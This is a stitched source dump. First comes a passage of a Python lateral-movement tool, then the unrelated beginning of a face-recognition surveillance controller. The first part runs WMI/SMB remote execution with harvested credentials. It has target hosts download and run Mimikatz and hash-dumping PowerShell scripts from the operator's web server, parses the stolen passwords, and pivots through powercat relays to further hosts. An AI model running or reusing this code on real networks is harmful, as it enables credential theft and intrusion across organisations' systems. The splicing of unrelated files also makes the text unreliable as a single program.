command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command \"IEX (New-Object System.Net.Webclient).DownloadString('http://"+myIP+":8888/"+tmpFilename5+"'); powercat -l -p "+str(self.portNo)+" -rep -r tcp:"+self.targetIP+":445\""
if verbose==True:
print command
results,status=runWMIEXEC(self.ip, domain, username, password, passwordHash, command)
if "SessionError" in str(results):
print "Sleeping for 5 seconds"
time.sleep(5)
else:
complete=True
def setColor(message, bold=True, color=None, onColor=None):
retVal = colored(message, color=color, on_color=onColor, attrs=("bold",))
return retVal
def runCommand(args, cwd = None, shell = False, kill_tree = True, timeout = -1, env = None):
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
p = Popen(args, shell = shell, cwd = cwd, stdout = PIPE, stderr = PIPE, env = env)
if timeout != -1:
signal(SIGALRM, alarm_handler)
alarm(timeout)
try:
stdout, stderr = p.communicate()
if timeout != -1:
alarm(0)
except Alarm:
pids = [p.pid]
if kill_tree:
pids.extend(get_process_children(p.pid))
for pid in pids:
# process might have died before getting to this line
# so wrap to avoid OSError: no such process
try:
kill(pid, SIGKILL)
except OSError:
pass
return -9, '', ''
return p.returncode, stdout, stderr
def parseMimikatzOutput(list1):
tmpPasswordList=[]
username1=""
domain1=""
password1=""
lmHash=""
ntHash=""
list2=list1.split("\n")
for x in list2:
if "Username :" in x or "Domain :" in x or "Password :" in x or "LM :" in x or "NTLM :" in x:
if "* Username :" in x:
username1=(x.replace("* Username :","")).strip()
if "* Domain :" in x:
domain1=(x.replace("* Domain :","")).strip()
if "* LM :" in x:
lmHash=(x.replace("* LM :","")).strip()
if "* NTLM :" in x:
ntHash=(x.replace("* NTLM :","")).strip()
if len(lmHash)<1:
lmHash='aad3b435b51404eeaad3b435b51404ee'
password1=lmHash+":"+ntHash
if "* Password :" in x:
password1=x.replace("* Password :","")
domain1=domain1.strip()
username1=username1.strip()
password1=password1.strip()
if len(username1)>1 and len(domain1)>1 and len(password1)>1:
#if (domain1!="(null)" or username1!="(null)" or password1!="(null)"):
if domain1!="(null)":
if not username1.endswith("$") and len(password1)<50:
if "\\" in username1:
domain1=username1.split("\\")[0]
username1=username1.split("\\")[1]
if len(password1)>0 and password1!='(null)':
if [domain1,username1,password1] not in tmpPasswordList:
tmpPasswordList.append([str(domain1),str(username1),str(password1)])
username1=""
domain1=""
password1=""
lmHash=""
ntHash=""
return tmpPasswordList
def get_ip_address():
command="ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\\2/p'"
results = runCommand(command, shell = True, timeout = 15)
resultList=results[1].split("\n")
return resultList[0]
def my_tcp_server():
port=8888
server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)
# server = ThreadingSimpleServer(('', port), RequestHandler)
addr, port = server.server_address
#print (setColor("[+]", bold, color="green"))+" Starting web server"
try:
while 1:
sys.stdout.flush()
server.handle_request()
except KeyboardInterrupt:
print "Finished"
def isOpen(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
s.shutdown(2)
return True
except:
return False
def isOpen1(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
s.shutdown(2)
if [ip,port] not in liveList:
liveList.append([ip,port])
return True
except Exception as e:
return False
def runWMIEXEC(targetIP,domain,username,password,passwordHash,command):
resultsOutput=''
aesKey = None
share = 'ADMIN$'
nooutput = False
k = False
dc_ip = None
executer = WMIEXEC(command,username,password,domain,passwordHash,aesKey,share,nooutput,k,dc_ip)
statusOutput=executer.run(targetIP)
resultsOutput=executer.getOutput()
return resultsOutput,statusOutput
def runSMBEXEC(targetIP,portNo,domain,username,password,passwordHash,command):
executer = CMDEXEC(username, password, domain, passwordHash, None, False, None, "SHARE", "C$", int(portNo), command)
executer.run(targetIP, targetIP)
resultsOutput = executer.getOutput()
executer.stop()
return resultsOutput
def scanThread(ip, port):
try:
t = threading.Thread(target=isOpen1, args=(ip, port))
t.start()
except Exception as e:
print e
pass
def tcp_scan((target, port)):
target, port = (target, port)
try:
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1,0))
conn.settimeout(1)
ret = conn.connect_ex((target, port))
if (ret==0):
sys.stdout.write("[%s] %s - %d/tcp open (SYN-ACK packet)\n" % (date_time(), target, port))
ports_ident["open"].append(port)
elif (ret == 111):
sys.stdout.write("[%s] %s - %d/tcp closed (RST packet)\n" % (date_time(), target, port))
ports_ident["closed"].append(port)
elif (ret == 11):
ports_ident["filtered"].append(port)
else:
print port
except socket.timeout:
ports_ident["filtered"].append(port)
conn.close()
def multi_threader_tcp():
while True:
ip_and_port = q.get()
print ip_and_port
tcp_scan(ip_and_port)
q.task_done()
def testAccount(targetIP, domain, username, password, passwordHash):
if username!="guest":
if domain==None or len(domain)<1:
domain='WORKGROUP'
cmd='whoami'
complete=False
results=''
status=''
while complete==False:
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)
if "can't start new thread" not in str(status):
complete=True
if 'STATUS_LOGON_FAILURE' in str(status):
if len(domain)>0:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+domain+"\\"+username+":"+password+" [Failed]"
else:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+username+":"+password+" [Failed]"
return False
elif 'rpc_s_access_denied' in str(status) or 'WBEM_E_ACCESS_DENIED' in str(status) or 'access_denied' in str(status).lower():
if len(domain)>0:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+domain+"\\"+username+":"+password+" [OK][Not Admin]"
else:
print (setColor("[-]", bold, color="red"))+" "+targetIP+":445 | "+username+":"+password+" [OK][Not Admin]"
return False
else:
#if len(domain)>0:
# print (setColor("[+]", bold, color="green"))+" "+targetIP+":445 | "+domain+"\\"+username+":"+password+" "+(setColor("[OK][Admin]", bold, color="green"))
#else:
# print (setColor("[+]", bold, color="green"))+" "+targetIP+":445 | "+username+":"+password+" "+(setColor("[OK][Admin]", bold, color="green"))
return True
@timeout_decorator.timeout(30)
def testMapDrive(tmpdomain,tmpusername,tmppassword):
results=''
command="net use \\\\"+ip+"\C$ "+tmppassword+" /USER:"+tmpdomain+"\\"+tmpusername
if verbose==True:
print command
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if verbose==True:
print results
return results
def monitor_server(ip,port):
time.sleep(10)
try:
while 1:
if not isOpen(ip,port):
print "Down: "+ip+":"+str(port)
time.sleep(10)
except KeyboardInterrupt:
print "Finished1"
parser = argparse.ArgumentParser(
prog='PROG',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=('''\
'''))
parser.add_argument("target", nargs='*', type=str, help="File containing a list of targets (e.g. 192.168.1.0/24 or 192.168.1.2)")
parser.add_argument("-C", type=str, dest="tmpCredList", help="File containing credentials (Domain||Username||Password)")
parser.add_argument("-d", type=str, dest="tmpDomain", help="Domain")
parser.add_argument("-u", type=str, dest="tmpUsername", help="Username")
parser.add_argument("-p", type=str, dest="tmpPassword", help="Password")
parser.add_argument("-D", "--debug", action='store_true', help="Verbose mode")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
inputStr=args.target[0]
if args.debug:
verbose=True
if args.tmpCredList:
if os.path.exists(orig_dir+"/"+args.tmpCredList):
with open(orig_dir+"/"+args.tmpCredList) as f:
lines = f.read().splitlines()
for x in lines:
domain1=x.split("||")[0]
username1=x.split("||")[1]
password1=x.split("||")[2]
if [domain1,username1,password1] not in userPassList:
userPassList.append([domain1,username1,password1])
if args.tmpDomain and args.tmpUsername and args.tmpPassword:
if [args.tmpDomain,args.tmpUsername,args.tmpPassword] not in userPassList:
userPassList.append([args.tmpDomain,args.tmpUsername,args.tmpPassword])
try:
os.chdir(web_dir)
threading.Thread(target=my_tcp_server).start()
myIP=get_ip_address()
ipList=[]
liveList=[]
portList=[]
portList.append("445")
if "/" in inputStr:
for x in IPNetwork(inputStr):
if str(x) not in ipList:
ipList.append(str(x))
else:
if os.path.exists(orig_dir+"/"+inputStr):
with open(orig_dir+"/"+inputStr) as f:
lines = f.read().splitlines()
for x in lines:
ipList.append(x)
'''
if "/" in x:
for y in IPNetwork(x):
if str(y) not in ipList:
if str(y) not in ipList:
ipList.append(str(y))
else:
if x not in ipList:
ipList.append(x)
'''
else:
ipList.append(inputStr)
'''
resource.setrlimit(resource.RLIMIT_NOFILE, (1024, 3000))
screenLock = threading.Semaphore(value=3)
for port in portList:
for x in ipList:
scanThread(x, port)
'''
nm = nmap.PortScanner()
for x in ipList:
nm.scan(x,'445')
tmpHostList=nm.all_hosts()
for y in tmpHostList:
if not y.endswith(".1") and not y.endswith(".255"):
if y not in liveList:
liveList.append(y)
print (setColor("[+]", bold, color="blue"))+" Checking for live IPs provided in file: "+inputStr
for x in liveList:
print "Found IP on Same Subnet: "+x
if x in ipList:
ipList.remove(x)
for x in ipList:
if x.endswith(".1") or x.endswith(".255"):
ipList.remove(x)
ipList[:] = [item for item in ipList if item != '']
for x in liveList:
targetIP=x
finalComplete=False
while finalComplete==False:
for y in userPassList:
if targetIP not in compromisedHostList:
domain=y[0]
username=y[1]
password=y[2]
passwordHash=None
if testAccount(targetIP, domain, username, password, passwordHash)==True:
print "\n"+(setColor("[+]", bold, color="green"))+" Testing credentials against "+targetIP+(setColor(" [OK][ADMIN]", bold, color="green"))+" ("+domain+"\\"+username+"|"+password+")"
ipStr=",".join(ipList)
results=''
#cmd="powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/milo2012/fccfe135d3b2646f191a83f8107971c8/raw/838011a6545b23c1c1775955501f3da54cd488cd/Invoke-Ping.ps1'); Invoke-Ping -Quiet "+ipStr+"\""
complete=False
print (setColor("[+]", bold, color="green"))+" Dumping password hashes from "+targetIP
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename1+"'); Get-PassHashes\""
if verbose==True:
print command
while complete==False:
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
results=results.replace("\r","")
results=results.replace("\n","")
if len(results)>2:
complete=True
else:
print "Sleeping for 3 seconds"
time.sleep(3)
tmpResultList=results.split(":::")
if len(tmpResultList)>0:
print "\n"
for z in tmpResultList:
z=z.strip()
if len(z)>0:
print z+":::"
print "\n"
if targetIP not in compromisedHostList:
compromisedHostList.append(targetIP)
complete=False
while complete==False:
print (setColor("[+]", bold, color="green"))+" Running Mimikatz against "+targetIP
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename2+"');Invoke-Mimikatz -DumpCreds\""
if verbose==True:
print command
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if "Could not connect: timed out" in str(results):
print "Sleeping for 3 seconds"
time.sleep(3)
else:
if len(str(results))>100:
tmpList=parseMimikatzOutput(results)
for x in tmpList:
tmpDomain=x[0]
tmpUsername=x[1]
tmpPassword=x[2]
print "\nIP: "+targetIP
print "Domain: "+x[0]
print "Username: "+x[1]
print "Password: "+x[2]
if [x[0],x[1],x[2]] not in userPassList:
userPassList.append([x[0],x[1],x[2]])
if targetIP not in compromisedHostList:
compromisedHostList.append(targetIP)
complete=True
complete=False
print "\n"+(setColor("[+]", bold, color="blue"))+" Ping sweep via host "+targetIP
while complete==False:
#cmd="powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/Invoke-Ping.ps1'); Invoke-Ping -Quiet "+ipStr+"\""
cmd="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename3+"'); Invoke-Ping -Quiet "+ipStr+"\""
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)
if "timed out" in str(results) or "System.IO.IOException" in str(results):
print "Sleeping for 3 seconds"
time.sleep(3)
else:
complete=True
tmpResultlist=results.split("\n")
tmpResultlist1=[]
tmpIPList1=[]
for z in tmpResultlist:
if len(z)>0:
print "Found IP on Adjacent Network: "+z
tmpIPList1.append(str(z).strip())
tmpIPListStr1=",".join(tmpIPList1)
print "\n"+(setColor("[+]", bold, color="blue"))+" Looking for NetBIOS hosts via host: "+targetIP
#cmd ="powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts "+tmpIPListStr1+" -ports 445 -noProgressMeter | Select-Object -ExpandProperty Hostname\""
cmd ="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command \"IEX (New-Object Net.WebClient).DownloadString('http://"+myIP+":8888/"+tmpFilename4+"'); Invoke-Portscan -Hosts "+tmpIPListStr1+" -ports '445,3389' -noProgressMeter | Select-Object Hostname,openPorts\""
if verbose==True:
print cmd
tmpNetbiosList=[]
tmpRDPList=[]
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd)
if len(results)>0 and "Exception" not in str(results):
tmpResultlist1=results.split("\n")
for z in tmpResultlist1:
if len(z)>0:
tmpHostNo=z.split(" ")[0]
if "445" in z:
print "Found port 445/tcp on host: "+tmpHostNo
if tmpHostNo not in tmpNetbiosList:
tmpNetbiosList.append(tmpHostNo)
if "3389" in z:
print "Found port 3389/tcp on host: "+tmpHostNo
if tmpHostNo not in tmpRDPList:
tmpRDPList.append(tmpHostNo)
else:
print "Unable to access "+myIP+":8000. Please restart."
os._exit(1)
print "\n"
for z in userPassList:
tmpdomain=z[0]
tmpusername=z[1]
tmppassword=z[2]
#tmpdomain="workgroup"
#tmpusername="milo"
#tmppassword="p@ssw0rd"
for ip in tmpNetbiosList:
ip=ip.strip()
results=''
results=testMapDrive(tmpdomain,tmpusername,tmppassword)
#Timer(30, timeout).start()
#command="net use \\\\"+ip+"\C$ "+tmppassword+" /USER:"+tmpdomain+"\\"+tmpusername
#results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if "Login failure" in str(results) or "Access is denied" in str(results) or "The specified network password is not correct" in str(results):
if "Login failure" in str(results) or "The specified network password is not correct" in str(results):
print (setColor("[-]", bold, color="red"))+" Testing credentials against "+ip+(setColor(" [FAIL]", bold, color="red"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
if "Access is denied" in str(results):
print (setColor("[-]", bold, color="red"))+" Testing credentials against "+ip+(setColor(" [OK]", bold, color="red"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
else:
if "The command completed successfully" in str(results):
print (setColor("[+]", bold, color="green"))+" Testing credentials against "+ip+(setColor(" [OK][ADMIN]", bold, color="green"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
#print "\n"+(setColor("[+]", bold, color="green"))+" Found: "+tmpdomain+"\\"+tmpusername+":"+tmppassword+" ("+ip+")"
command='tasklist /FI "IMAGENAME eq powershell.exe" /FO CSV'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
if "access_denied" in str(status).lower():
print (setColor("[+]", bold, color="red"))+" Invalid credentials"
os._exit(1)
if "powershell.exe" in results:
#print (setColor("[+]", bold, color="green"))+" Checking and killing existing powershell.exe processes"
command='taskkill /F /IM powershell.exe'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print "\n"+(setColor("[+]", bold, color="blue"))+" Listing all IP addresses on Host: "+targetIP
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" -Command (netsh i ip sh ad)-match'Address'-replace'.+:\s+(\S+)','$1'"
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
tmpResultList=results.split("\n")
tmpIPList=[]
for z in tmpResultList:
z=z.strip()
if "127.0.0.1" not in z:
if z not in tmpIPList and len(z)>0:
tmpIPList.append(z)
print (setColor("[+]", bold, color="blue"))+" Upload Temporary Files to Host: "+targetIP
#command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -ep bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/Start-WebServer.ps1\',\'C:\\windows\\temp\\Start-WebServer.ps1\');"'
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/'+tmpFilename6+'\',\'C:\\windows\\temp\\'+tmpFilename6+'\');"'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print results
#command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -ep bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/Invoke-Mimikatz.ps1\',\'C:\\windows\\temp\\Invoke-Mimikatz.ps1\');"'
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/'+tmpFilename2+'\',\'C:\\windows\\temp\\'+tmpFilename2+'\');"'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print results
#command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -ep bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/Get-PassHashes.ps1\',\'C:\\windows\\temp\\Get-PassHashes.ps1\');"'
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "(New-Object Net.WebClient).DownloadFile(\'http://'+myIP+':8888/'+tmpFilename1+'\',\'C:\\windows\\temp\\'+tmpFilename1+'\');"'
results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
print results
hopPoint1=targetIP
hopPoint2=ip
hopPoint1List=[]
hopPoint1List.append([domain,username,password])
hopPoint2List=[]
hopPoint2List.append([tmpdomain,tmpusername,tmppassword])
example = relayThread(hopPoint1,hopPoint2,relayPortNo,hopPoint1List,hopPoint2List)
tmpSelectedIP=''
if len(tmpIPList)>1:
print (setColor("[+]", bold, color="green"))+" Host has multiple IP addresses: "+", ".join(tmpIPList)
print (setColor("[+]", bold, color="blue"))+" Checking which IP address on "+targetIP+" is accessible by "+ip
while len(tmpSelectedIP)<1:
for z in tmpIPList:
command='C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe '+powershellArgs+' -Command "$ping = new-object system.net.networkinformation.ping; $ping.send(\''+z+'\') | Select-Object -ExpandProperty Status"'
if verbose==True:
print command
executer = smbexec2.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
executer.run(targetIP,targetIP)
results=executer.getOutput()
if verbose==True:
print results
if "Success" in str(results):
tmpSelectedIP=z
print (setColor("[+]", bold, color="green"))+" IP address "+tmpSelectedIP+" reachable by "+ip
else:
tmpSelectedIP=tmpIPList[0]
if len(tmpSelectedIP)<1:
print "Unable to find a route from "+ip+" to "+targetIP
else:
complete=False
print (setColor("[+]", bold, color="green"))+" Dumping password hashes from "+ip+" via "+targetIP+":"+str(relayPortNo)
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\Get-PassHashes.ps1'); Get-PassHashes\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\\"+tmpFilename1+"'); Get-PassHashes\""
if verbose==True:
print command
while complete==False:
executer = smbexec2.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
executer.run(targetIP,targetIP)
results=executer.getOutput()
results=results.replace("\r","")
results=results.replace("\n","")
if len(results)>2:
complete=True
else:
print "Sleeping for 3 seconds"
time.sleep(3)
tmpResultList=results.split(":::")
if len(tmpResultList)>0:
print "\n"
for z in tmpResultList:
z=z.strip()
if len(z)>0:
print z+":::"
print "\n"
if ip not in compromisedHostList:
compromisedHostList.append(ip)
print (setColor("[+]", bold, color="green"))+" Running Mimikatz against "+ip+" via "+targetIP+":"+str(relayPortNo)
#command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\""
command="C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "+powershellArgs+" \"IEX (New-Object Net.WebClient).DownloadString('http://"+tmpSelectedIP+":8000/download?filepath=C:\windows\\temp\\"+tmpFilename2+"');Invoke-Mimikatz -DumpCreds\""
if verbose==True:
print command
complete=False
while complete==False:
executer = smbexec2.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
executer.run(targetIP,targetIP)
results=executer.getOutput()
if len(str(results))>100:
tmpList=parseMimikatzOutput(results)
for x in tmpList:
tmpDomain=x[0]
tmpUsername=x[1]
tmpPassword=x[2]
print "\nIP: "+ip+" ("+targetIP+":"+str(relayPortNo)+")"
print "Domain: "+x[0]
print "Username: "+x[1]
print "Password: "+x[2]
complete=True
if ip not in compromisedHostList:
compromisedHostList.append(ip)
else:
print "Sleeping for 3 seconds"
time.sleep(3)
print "\n"+(setColor("[+]", bold, color="green"))+" Clearing temp files on "+targetIP
#command='cmd /c del C:\\windows\\temp /F /Q'
#results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)
#print results
#executer = smbexec.CMDEXEC(tmpusername, tmppassword, tmpdomain, hashes, aesKey, k, dc_ip, mode, share, relayPortNo, command)
#executer.run(targetIP,targetIP)
#if ip in str(results) and results!=None:
# print (setColor("[+]", bold, color="green"))+" Testing credentials against "+ip+(setColor(" [OK]", bold, color="green"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
finalComplete=True
else:
print (setColor("[-]", bold, color="red"))+" Testing credentials against "+ip+(setColor(" [FAIL]", bold, color="red"))+" ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
#if "nt authority\system" not in str(results) and results!=None:
# print (setColor("[+]", bold, color="green"))+" Testing credentials against "+ip+" [NOT OK] ("+tmpdomain+"\\"+tmpusername+"|"+tmppassword+")"
# os._exit(1)
finalComplete=True
os.remove(web_dir+"/"+tmpFilename1)
os.remove(web_dir+"/"+tmpFilename2)
os.remove(web_dir+"/"+tmpFilename3)
os.remove(web_dir+"/"+tmpFilename4)
os.remove(web_dir+"/"+tmpFilename5)
os.remove(web_dir+"/"+tmpFilename6)
print "exit0"
sys.exit()
print "exit1"
os._exit(1)
except (Exception, KeyboardInterrupt), e:
logging.critical(str(e))
os._exit(1)
|
SurveillanceSystem.py
|
# Surveillance System Controller.
# Brandon Joffe
# 2016
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code used in this project included opensource software (Openface)
# developed by Brandon Amos
# Copyright 2015-2016 Carnegie Mellon University
import time
import argparse
import cv2
import os
import numpy as np
import dlib
from subprocess import Popen, PIPE
import os.path
import sys
import logging
from logging.handlers import RotatingFileHandler
import threading
import time
from datetime import datetime, timedelta
#import smtplib
#from email.mime.multipart import MIMEMultipart
#from email.mime.text import MIMEText
#from email.mime.base import MIMEBase
#from email import encoders
import requests
import json
import Camera
import FaceRecogniser
import ImageUtils
import random
#
from websocket import create_connection
import apprise
# Get paths for models
# //////////////////////////////////////////////////////////////////////////////////////////////
fileDir = os.path.dirname(os.path.realpath(__file__))
luaDir = os.path.join(fileDir, '..', 'batch-represent')
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
parser = argparse.ArgumentParser()
parser.add_argument('--dlibFacePredictor',
type=str, help="Path to dlib's face predictor.",
default=os.path.join(dlibModelDir , "shape_predictor_68_face_landmarks.dat"))
parser.add_argument('--networkModel',
type=str, help="Path to Torch network model.",
default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int, help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--unknown', type=bool, default=False, help='Try to predict unknown people')
args = parser.parse_args()
args.cuda = True
start = time.time()
np.set_printoptions(precision=2)
if args.cuda and dlib.cuda.get_num_devices()>0:
print("Surveillance System Controller DLIB using CUDA")
dlib.DLIB_USE_CUDA = True
try:
os.makedirs('logs', exist_ok=True) # Python>3.2
except TypeError:
try:
os.makedirs('logs')
except OSError as exc: # Python >2.5
        print("logging directory already exists")
logger = logging.getLogger()
formatter = logging.Formatter("(%(threadName)-10s) %(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler = RotatingFileHandler("logs/surveillance.log", maxBytes=10000000, backupCount=10)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
class SurveillanceSystem(object):
""" The SurveillanceSystem object is the heart of this application.
    It provides all the central processing and ties everything
    together. It generates camera frame processing threads as
    well as an alert monitoring thread. A camera frame processing
thread can process a camera using 5 different processing methods.
These methods aim to allow the user to adapt the system to their
needs and can be found in the process_frame() function. The alert
monitoring thread continually checks the system state and takes
action if a particular event occurs. """
def __init__(self):
self.recogniser = FaceRecogniser.FaceRecogniser()
        self.trainingEvent = threading.Event() # Used to halt processing while training the classifier
self.trainingEvent.set()
self.drawing = True
self.alarmState = 'Disarmed' # Alarm states - Disarmed, Armed, Triggered
self.alarmTriggerd = False
self.alerts = [] # Holds all system alerts
self.cameras = [] # Holds all system cameras
self.camerasLock = threading.Lock() # Used to block concurrent access of cameras []
self.cameraProcessingThreads = []
self.peopleDB = []
self.confidenceThreshold = 50 # Used as a threshold to classify a person as unknown
# Initialization of alert processing thread
self.alertsLock = threading.Lock()
self.alertThread = threading.Thread(name='alerts_process_thread_',target=self.alert_engine,args=())
self.alertThread.daemon = False
self.alertThread.start()
# Used for testing purposes
###################################
self.testingResultsLock = threading.Lock()
self.detetectionsCount = 0
self.trueDetections = 0
self.counter = 0
####################################
self.get_face_database_names() # Gets people in database for web client
self.apobj = None
self._read_config()
#//////////////////////////////////////////////////// Camera Examples ////////////////////////////////////////////////////
#self.cameras.append(Camera.IPCamera("testing/iphoneVideos/singleTest.m4v","detect_recognise_track",False)) # Video Example - uncomment and run code
# self.cameras.append(Camera.IPCamera("http://192.168.1.33/video.mjpg","detect_recognise_track",False))
# processing frame threads
for i, cam in enumerate(self.cameras):
thread = threading.Thread(name='frame_process_thread_' + str(i),target=self.process_frame,args=(cam,))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def _read_config(self):
if not os.path.isfile('config.json'):
return
with open('config.json') as json_file:
config = json.load(json_file)
for cam in config["cameras"]:
print("cam", cam)
dlibDetection = False
if cam["dlibDetection"].lower() == "true":
dlibDetection = True
fpsTweak = False
if cam["fpsTweak"].lower() == "true":
fpsTweak = True
self.cameras.append(Camera.IPCamera(cam["url"], cam["cameraFunction"], dlibDetection, fpsTweak))
for al in config["alerts"]:
print("alert", al)
self.alerts.append(Alert(al["alarmState"],
al["camera"],
al["event"],
al["person"],
al["actions"],
al["emailAddress"],
int(al["confidence"])))
def write_config(self):
config = {}
config["cameras"] = []
config["alerts"] = []
# Camera: url, cameraFunction, dlibDetection, fpsTweak
for cam in self.cameras:
            config["cameras"].append({"url": cam.url,
                                      "cameraFunction": cam.cameraFunction,
                                      "dlibDetection": str(cam.dlibDetection),
                                      "fpsTweak": str(cam.fpsTweak)})  # stored as strings so _read_config's .lower() round-trips
# Alert: alarmState, camera, event, person, actions, emailAddress, confidence
for al in self.alerts:
config["alerts"].append({"alarmState": al.alarmState,
"camera": al.camera,
"event": al.event,
"person": al.person,
"actions": al.actions,
"emailAddress": al.emailAddress,
"confidence": al.confidence})
with open('config.json', 'w') as outfile:
json.dump(config, outfile)
def add_camera(self, camera):
"""Adds new camera to the System and generates a
frame processing thread"""
        print("add_camera - {}".format(camera))
self.cameras.append(camera)
thread = threading.Thread(name='frame_process_thread_' +
str(len(self.cameras)),
target=self.process_frame,
args=(self.cameras[-1],))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
    def remove_camera(self, camID):
        """Remove a camera from the System and kill its processing thread"""
print("remove_camera - camID {}".format(camID))
if "_" in camID:
cid = camID.split("_")[1]
else:
cid = camID
cam = self.cameras[int(cid)]
        cam.captureThread.stop = True  # signal the capture thread to stop
